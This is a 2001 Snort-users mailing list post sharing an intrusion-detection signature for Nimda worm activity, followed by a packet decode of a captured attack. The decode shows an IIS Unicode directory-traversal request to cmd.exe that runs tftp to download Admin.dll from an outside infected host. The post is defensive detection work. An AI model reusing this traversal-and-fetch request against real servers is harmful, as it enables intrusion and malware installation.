Signature for NIMDA command

[Steve Halligan <agent33 () geeksquad com>]

This is the signature to detect a nimda infected server telling a server
that is has determined is vulnerable to use tftp to upload the admin.dll
file.  If you see this one trip you have been gotten.

alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"Successful NIMDA TFTP
activity"; flags:A+;  uricontent:"cmd.exe?"; uricontent:"c+tftp -i"; nocase;
classtype: successful-admin;)

here is a packet decode of it that I based the rule on.

-steve

----------------------------------------------------------------------------
--
#(2 - 25210) [2001-09-18 10:17:15]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> 65.29.59.70
      hlen=5 TOS=0 dlen=191 ID=44180 flags=0 offset=0 TTL=119 chksum=42351
TCP:  port=3905 -> dport: 80  flags=***AP*** seq=461005741
      ack=288345 off=5 res=0 win=8760 urp=0 chksum=246
Payload:  length = 139

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74   m32/cmd.exe?/c+t
030 : 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34 33   ftp -i 65.29.243
040 : 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E 64   .180 GET Admin.d
050 : 6C 6C 20 63 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20   ll c:\Admin.dll 
060 : 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50   :\Admin.dll HTTP
070 : 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D   /1.0..Host: www.
080 : 0A 43 6F 6E 6E 6E 65 63 74 69 6F                  .Connnectio

_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users